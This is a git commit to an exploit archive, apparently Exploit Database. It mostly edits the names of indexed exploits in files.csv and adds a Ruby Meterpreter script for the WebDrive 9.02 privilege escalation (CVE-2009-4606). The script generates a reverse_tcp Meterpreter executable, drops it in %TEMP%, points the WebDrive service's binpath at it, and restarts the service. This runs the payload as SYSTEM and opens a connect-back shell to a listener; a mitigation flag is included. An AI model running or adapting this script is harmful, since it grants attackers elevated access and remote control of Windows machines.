DB: 2016-03-09

1 new exploits
2016-03-09 05:02:46 +00:00 · 2016-03-09 05:02:46 +00:00 · a7c11413af
commit a7c11413af
parent 4cae1b12fc
8 changed files with 388 additions and 269 deletions
--- a/files.csv
+++ b/files.csv
@ -2411,7 +2411,7 @@ id,file,description,date,author,platform,type,port
 2719,platforms/php/webapps/2719.php,"Quick.Cms.Lite <= 0.3 (Cookie sLanguage) Local File Include Exploit",2006-11-05,Kacper,php,webapps,0
 2720,platforms/php/webapps/2720.pl,"PHP Classifieds <= 7.1 (detail.php) Remote SQL Injection Exploit",2006-11-05,ajann,php,webapps,0
 2721,platforms/php/webapps/2721.php,"Ultimate PHP Board <= 2.0 - (header_simple.php) File Include Exploit",2006-11-05,Kacper,php,webapps,0
-2722,platforms/php/webapps/2722.pl,"Webdrivers Simple Forum (message_details.php) SQL Injection Exploit",2006-11-05,Bl0od3r,php,webapps,0
+2722,platforms/php/webapps/2722.pl,"Webdrivers Simple Forum - (message_details.php) SQL Injection Exploit",2006-11-05,Bl0od3r,php,webapps,0
 2724,platforms/php/webapps/2724.txt,"Soholaunch Pro <= 4.9 r36 - Remote File Inclusion Vulnerabilities",2006-11-06,the_day,php,webapps,0
 2725,platforms/php/webapps/2725.txt,"Cyberfolio <= 2.0 RC1 (av) Remote File Include Vulnerabilities",2006-11-06,the_day,php,webapps,0
 2726,platforms/php/webapps/2726.txt,"Agora 1.4 RC1 (MysqlfinderAdmin.php) Remote File Include Vulnerability",2006-11-06,the_day,php,webapps,0
@ -7954,7 +7954,7 @@ id,file,description,date,author,platform,type,port
 8444,platforms/windows/local/8444.cpp,"Star Downloader Free <= 1.45 - (.dat) Universal SEH Overwrite Exploit",2009-04-15,dun,windows,local,0
 8445,platforms/windows/dos/8445.pl,"Microsoft Windows Media Player - (.mid) Integer Overflow PoC",2009-04-15,HuoFu,windows,dos,0
 8446,platforms/php/webapps/8446.txt,"FreeWebshop.org 2.2.9 RC2 (lang_file) Local File Inclusion Vulnerability",2009-04-15,ahmadbady,php,webapps,0
-8447,platforms/windows/dos/8447.txt,"Zervit Webserver 0.02 - Remote Buffer Overflow PoC",2009-04-15,e.wiZz!,windows,dos,0
+8447,platforms/windows/dos/8447.txt,"Zervit Web Server 0.02 - Remote Buffer Overflow PoC",2009-04-15,e.wiZz!,windows,dos,0
 8448,platforms/php/webapps/8448.php,"Geeklog <= 1.5.2 - savepreferences()/*blocks[] SQL Injection Exploit",2009-04-16,Nine:Situations:Group,php,webapps,0
 8449,platforms/php/webapps/8449.txt,"NetHoteles 2.0/3.0 (Auth Bypass) SQL Injection Vulnerability",2009-04-16,Dns-Team,php,webapps,0
 8450,platforms/php/webapps/8450.txt,"Online Password Manager 4.1 Insecure Cookie Handling Vulnerability",2009-04-16,ZoRLu,php,webapps,0
@ -7970,7 +7970,7 @@ id,file,description,date,author,platform,type,port
 8460,platforms/php/webapps/8460.txt,"SMA-DB 0.3.13 - Multiple Remote File Inclusion Vulnerabilities",2009-04-16,JosS,php,webapps,0
 8461,platforms/php/webapps/8461.txt,"chCounter 3.1.3 (Login Bypass) SQL Injection Vulnerability",2009-04-16,tmh,php,webapps,0
 8462,platforms/windows/dos/8462.pl,"MagicISO CCD/Cue Local Heap Overflow Exploit PoC",2009-04-16,Stack,windows,dos,0
-8463,platforms/windows/remote/8463.txt,"Zervit Webserver 0.02 - Remote Directory Traversal Vulnerability",2009-04-16,e.wiZz!,windows,remote,0
+8463,platforms/windows/remote/8463.txt,"Zervit Web Server 0.02 - Remote Directory Traversal Vulnerability",2009-04-16,e.wiZz!,windows,remote,0
 8464,platforms/php/webapps/8464.txt,"Tiny Blogr 1.0.0 rc4 (Auth Bypass) SQL Injection Vulnerability",2009-04-17,"Salvatore Fresta",php,webapps,0
 8465,platforms/windows/dos/8465.pl,"Microsoft Media Player - (quartz.dll .mid) Denial of Service Exploit",2009-04-17,"Code Audit Labs",windows,dos,0
 8466,platforms/windows/dos/8466.pl,"Microsoft GDI Plugin .png Infinite Loop Denial of Service PoC",2009-04-17,"Code Audit Labs",windows,dos,0
@ -8007,7 +8007,7 @@ id,file,description,date,author,platform,type,port
 8497,platforms/php/webapps/8497.txt,"Creasito e-Commerce 1.3.16 (Auth Bypass) SQL Injection Vuln",2009-04-20,"Salvatore Fresta",php,webapps,0
 8498,platforms/php/webapps/8498.txt,"eLitius 1.0 - Arbitrary Database Backup Exploit",2009-04-20,"ThE g0bL!N",php,webapps,0
 8499,platforms/php/webapps/8499.php,"Dokeos Lms <= 1.8.5 (whoisonline.php) PHP Code Injection Exploit",2009-04-21,EgiX,php,webapps,0
-8500,platforms/windows/dos/8500.py,"Zervit Webserver 0.3 - Remote Denial of Service Exploit",2009-04-21,shinnai,windows,dos,0
+8500,platforms/windows/dos/8500.py,"Zervit Web Server 0.3 - Remote Denial of Service Exploit",2009-04-21,shinnai,windows,dos,0
 8501,platforms/php/webapps/8501.txt,"CRE Loaded 6.2 (products_id) SQL Injection Vulnerability",2009-04-21,Player,php,webapps,0
 8502,platforms/php/webapps/8502.txt,"pastelcms 0.8.0 - (LFI/SQL) Multiple Vulnerabilities",2009-04-21,SirGod,php,webapps,0
 8503,platforms/php/webapps/8503.txt,"TotalCalendar 2.4 (include) Local File Inclusion Vulnerability",2009-04-21,SirGod,php,webapps,0
@ -8029,7 +8029,7 @@ id,file,description,date,author,platform,type,port
 8519,platforms/windows/local/8519.pl,"CoolPlayer Portable 2.19.1 - (m3u) Buffer Overflow Exploit",2009-04-22,Stack,windows,local,0
 8520,platforms/windows/local/8520.py,"CoolPlayer Portable 2.19.1 - (m3u) Buffer Overflow Exploit (2)",2009-04-22,His0k4,windows,local,0
 8521,platforms/php/webapps/8521.txt,"fowlcms 1.1 (ab/lfi/su) Multiple Vulnerabilities",2009-04-23,YEnH4ckEr,php,webapps,0
-8522,platforms/windows/dos/8522.pl,"Zervit HTTP Server <= 0.3 (sockets++ crash) Remote Denial of Service",2009-04-22,"Jonathan Salwan",windows,dos,0
+8522,platforms/windows/dos/8522.pl,"Zervit Web Server <= 0.3 - (sockets++ crash) Remote Denial of Service",2009-04-22,"Jonathan Salwan",windows,dos,0
 8523,platforms/windows/dos/8523.txt,"Norton Ghost Support module for EasySetup wizard Remote DoS PoC",2009-04-23,shinnai,windows,dos,0
 8524,platforms/windows/dos/8524.txt,"Home Web Server <= r1.7.1 (build 147) Gui Thread-Memory Corruption",2009-04-23,Aodrulez,windows,dos,0
 8525,platforms/windows/remote/8525.pl,"Dream FTP Server 1.02 (users.dat) Arbitrary File Disclosure Exploit",2009-04-23,Cyber-Zone,windows,remote,0
@ -8171,7 +8171,7 @@ id,file,description,date,author,platform,type,port
 8663,platforms/windows/local/8663.pl,"CastRipper 2.50.70 - (.pls) Universal Stack Overflow Exploit",2009-05-12,zAx,windows,local,0
 8664,platforms/php/webapps/8664.pl,"BIGACE CMS 2.5 (username) Remote SQL Injection Exploit",2009-05-12,YEnH4ckEr,php,webapps,0
 8665,platforms/windows/dos/8665.html,"Java SE Runtime Environment - JRE 6 Update 13 - Multiple Vulnerabilities",2009-05-13,shinnai,windows,dos,0
-8666,platforms/windows/remote/8666.txt,"zervit webserver 0.4 - Directory Traversal / memory corruption PoC",2009-05-13,"e.wiZz! & shinnai",windows,remote,0
+8666,platforms/windows/remote/8666.txt,"Zervit Web Server 0.4 - Directory Traversal / Memory Corruption PoC",2009-05-13,"e.wiZz! & shinnai",windows,remote,0
 8667,platforms/php/webapps/8667.txt,"TinyButStrong 3.4.0 (script) Local File Disclosure Vulnerability",2009-05-13,ahmadbady,php,webapps,0
 8668,platforms/php/webapps/8668.txt,"Password Protector SD 1.3.1 Insecure Cookie Handling Vulnerability",2009-05-13,Mr.tro0oqy,php,webapps,0
 8669,platforms/multiple/dos/8669.c,"ipsec-tools racoon frag-isakmp Denial of Service PoC",2009-05-13,mu-b,multiple,dos,0
@ -8224,7 +8224,7 @@ id,file,description,date,author,platform,type,port
 8718,platforms/php/webapps/8718.txt,"douran portal <= 3.9.0.23 - Multiple Vulnerabilities",2009-05-18,Abysssec,php,webapps,0
 8719,platforms/asp/webapps/8719.py,"Dana Portal - Remote Change Admin Password Exploit",2009-05-18,Abysssec,asp,webapps,0
 8720,platforms/multiple/dos/8720.c,"OpenSSL <= 0.9.8k / 1.0.0-beta2 - DTLS Remote Memory Exhaustion DoS",2009-05-18,"Jon Oberheide",multiple,dos,0
-8721,platforms/windows/dos/8721.pl,"Zervit Webserver 0.04 - (GET Request) Remote Buffer Overflow PoC",2009-05-18,Stack,windows,dos,0
+8721,platforms/windows/dos/8721.pl,"Zervit Web Server 0.04 - (GET Request) Remote Buffer Overflow PoC",2009-05-18,Stack,windows,dos,0
 8722,platforms/windows/dos/8722.py,"Mereo 1.8.0 (Get Request) Remote Denial of Service Exploit",2009-05-18,Stack,windows,dos,0
 8724,platforms/php/webapps/8724.txt,"LightOpenCMS 0.1 (id) Remote SQL Injection Vulnerability",2009-05-18,Mi4night,php,webapps,0
 8725,platforms/php/webapps/8725.php,"Jieqi CMS <= 1.5 - Remote Code Execution Exploit",2009-05-18,Securitylab.ir,php,webapps,0
@ -10279,7 +10279,7 @@ id,file,description,date,author,platform,type,port
 11196,platforms/windows/dos/11196.html,"Foxit Reader 3.1.4.1125 - ActiveX Heap Overflow PoC",2010-01-19,"SarBoT511 and D3V!L FUCKER",windows,dos,0
 11197,platforms/windows/dos/11197.py,"Mini-stream Ripper 3.0.1.1 - (.smi) Local Buffer Overflow PoC",2010-01-19,d3b4g,windows,dos,0
 11198,platforms/php/webapps/11198.txt,"al3jeb script Remote Login Bypass Exploit",2010-01-19,"cr4wl3r ",php,webapps,0
-11199,platforms/windows/local/11199.txt,"Windows NT - User Mode to Ring - Escalation Vulnerability",2010-01-19,"Tavis Ormandy",windows,local,0
+11199,platforms/windows/local/11199.txt,"Windows NT - User Mode to Ring Escalation Vulnerability (KiTrap0D)",2010-01-19,"Tavis Ormandy",windows,local,0
 11202,platforms/windows/local/11202.pl,"RM Downloader .m3u BoF (SEH)",2010-01-19,jacky,windows,local,0
 11203,platforms/multiple/remote/11203.py,"Pidgin MSN <= 2.6.4 File Download Vulnerability",2010-01-19,"Mathieu GASPARD",multiple,remote,0
 11204,platforms/windows/remote/11204.html,"AOL 9.5 - ActiveX Exploit (Heap Spray) (0day)",2010-01-20,Dz_attacker,windows,remote,0
@ -10329,7 +10329,7 @@ id,file,description,date,author,platform,type,port
 11261,platforms/php/webapps/11261.txt,"UGiA PHP UPLOADER 0.2 - Shell Upload Vulnerability",2010-01-26,indoushka,php,webapps,0
 11262,platforms/php/webapps/11262.php,"Joomla 1.5.12 connect back Exploit",2010-01-26,"Nikola Petrov",php,webapps,0
 11263,platforms/php/webapps/11263.php,"Joomla 1.5.12 read/exec Remote files",2010-01-26,"Nikoal Petrov",php,webapps,0
-11264,platforms/windows/local/11264.txt,"South River Technologies WebDrive Service - Bad Security Descriptor Local Privilege Escalation",2010-01-26,Trancer,windows,local,0
+11264,platforms/windows/local/11264.rb,"South River Technologies WebDrive Service 9.02 build 2232 - Bad Security Descriptor Local Privilege Escalation",2010-01-26,Trancer,windows,local,0
 11265,platforms/windows/dos/11265.pl,"KOL WaveIOX 1.04 - (.wav) Local Buffer Overflow PoC",2010-01-26,"cr4wl3r ",windows,dos,0
 11266,platforms/windows/dos/11266.pl,"KOL Wave Player 1.0 - (.wav) Local Buffer Overflow PoC",2010-01-26,"cr4wl3r ",windows,dos,0
 11267,platforms/windows/local/11267.py,"Winamp 5.572 - Exploit SEH",2010-01-26,TecR0c,windows,local,0
@ -11483,8 +11483,8 @@ id,file,description,date,author,platform,type,port
 12578,platforms/windows/dos/12578.c,"Adobe Shockwave Player 11.5.6.606 (DIR) Multiple Memory Vulnerabilities",2010-05-12,LiquidWorm,windows,dos,0
 12579,platforms/php/webapps/12579.txt,"Joomla Custom PHP Pages Component com_php LFI Vulnerability",2010-05-12,"Chip d3 bi0s",php,webapps,0
 12580,platforms/windows/remote/12580.txt,"miniwebsvr 0.0.10 - Directory Traversal/Listing Exploits",2010-05-12,Dr_IDE,windows,remote,0
-12581,platforms/windows/remote/12581.txt,"zervit Web Server 0.4 - Source Disclosure/Download",2010-05-12,Dr_IDE,windows,remote,0
-12582,platforms/windows/remote/12582.txt,"zervit Web Server 0.4 - Directory Traversals",2010-05-12,Dr_IDE,windows,remote,0
+12581,platforms/windows/remote/12581.txt,"Zervit Web Server 0.4 - Source Disclosure/Download",2010-05-12,Dr_IDE,windows,remote,0
+12582,platforms/windows/remote/12582.txt,"Zervit Web Server 0.4 - Directory Traversals",2010-05-12,Dr_IDE,windows,remote,0
 12583,platforms/php/webapps/12583.txt,"e-webtech (fixed_page.asp) SQL Injection Vulnerability",2010-05-12,FL0RiX,php,webapps,0
 12584,platforms/php/webapps/12584.txt,"PolyPager 1.0rc10 - (fckeditor) Remote Arbitrary File Upload Vulnerability",2010-05-12,eidelweiss,php,webapps,0
 12585,platforms/php/webapps/12585.txt,"4images <= 1.7.7 (image_utils.php) Remote Command Execution Vulnerability",2010-05-12,"Sn!pEr.S!Te Hacker",php,webapps,0
--- a/platforms/windows/local/11264.rb
+++ b/platforms/windows/local/11264.rb
@ -0,0 +1,119 @@
+##
+# South River Technologies WebDrive Service Bad Security Descriptor Local Privilege Escalation.
+#
+#  This module exploits a privilege escalation vulnerability in South River Technologies WebDrive. 
+#  Due to an empty security descriptor, a local attacker can gain elevated privileges.
+#  Tested on South River Technologies WebDrive 9.02 build 2232 on Microsoft Windows XP SP3.
+#  Vulnerability mitigation featured.
+#
+#  Credit:
+#   - Discovery			- Nine:Situations:Group::bellick
+#   - Meterpreter script	- Trancer
+#
+#  References:
+#   - http://retrogod.altervista.org/9sg_south_river_priv.html
+#   - http://www.rec-sec.com/2010/01/26/srt-webdrive-privilege-escalation/
+#   - http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-4606
+#   - http://osvdb.org/show/osvdb/59080
+#
+#  mtrancer[@]gmail.com
+#  http://www.rec-sec.com
+##
+
+#
+# Options
+#
+opts = Rex::Parser::Arguments.new(
+	"-h"  => [ false,  "This help menu"],
+	"-m"  => [ false,  "Mitigate"],
+	"-r"  => [ true,   "The IP of the system running Metasploit listening for the connect back"],
+	"-p"  => [ true,   "The port on the remote host where Metasploit is listening"]
+)
+
+#
+# Default parameters
+#
+
+rhost = Rex::Socket.source_address("1.2.3.4")
+rport = 4444
+sname = 'WebDriveService'
+pname = 'wdService.exe'
+
+#
+# Option parsing
+#
+opts.parse(args) do |opt, idx, val|
+	case opt
+	when "-h"
+		print_status("South River Technologies WebDrive Service Bad Security Descriptor Local Privilege Escalation.")
+		print_line(opts.usage)
+		raise Rex::Script::Completed
+	when "-m"
+		client.sys.process.get_processes().each do |m|
+			if ( m['name'] == pname )
+				print_status("Found vulnerable process #{m['name']} with pid #{m['pid']}.")
+				
+				# Set correct service security descriptor to mitigate the vulnerability
+				print_status("Setting correct security descriptor for the South River Technologies WebDrive Service.")
+				client.sys.process.execute("cmd.exe /c sc sdset \"#{sname}\" D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY)", nil, {'Hidden' => 'true'})
+			end
+		end
+		raise Rex::Script::Completed
+	when "-r"
+		rhost = val
+	when "-p"
+		rport = val.to_i
+	end
+end
+
+client.sys.process.get_processes().each do |m|
+	if ( m['name'] == pname )
+
+		print_status("Found vulnerable process #{m['name']} with pid #{m['pid']}.")
+
+		# Build out the exe payload.
+		pay = client.framework.payloads.create("windows/meterpreter/reverse_tcp")
+		pay.datastore['LHOST'] = rhost
+		pay.datastore['LPORT'] = rport
+		raw  = pay.generate
+
+		exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
+
+		# Place our newly created exe in %TEMP%
+		tempdir = client.fs.file.expand_path("%TEMP%")
+		tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
+		print_status("Sending EXE payload '#{tempexe}'.")
+		fd = client.fs.file.new(tempexe, "wb")
+		fd.write(exe)
+		fd.close
+
+		# Stop the vulnerable service
+		print_status("Stopping service \"#{sname}\"...")
+		client.sys.process.execute("cmd.exe /c sc stop \"#{sname}\" ", nil, {'Hidden' => 'true'})
+
+		# Set exe payload as service binpath
+		print_status("Setting \"#{sname}\" to #{tempexe}...")
+		client.sys.process.execute("cmd.exe /c sc config \"#{sname}\" binpath= #{tempexe}", nil, {'Hidden' => 'true'})
+		sleep(1)
+		
+		# Restart the service
+		print_status("Restarting the \"#{sname}\" service...")
+		client.sys.process.execute("cmd.exe /c sc start \"#{sname}\" ", nil, {'Hidden' => 'true'})
+
+		# Our handler to recieve the callback.
+		handler = client.framework.exploits.create("multi/handler")
+		handler.datastore['PAYLOAD'] 		= "windows/meterpreter/reverse_tcp"
+		handler.datastore['LHOST']   		= rhost
+		handler.datastore['LPORT']   		= rport
+		handler.datastore['ExitOnSession'] 	= false
+
+		handler.exploit_simple(
+			'Payload'	=> handler.datastore['PAYLOAD'],
+			'RunAsJob'	=> true
+		)
+
+		# Set service binpath back to normal
+		client.sys.process.execute("cmd.exe /c sc config \"#{sname}\" binpath= %ProgramFiles%\\WebDrive\\#{pname}", nil, {'Hidden' => 'true'})
+			
+	end
+end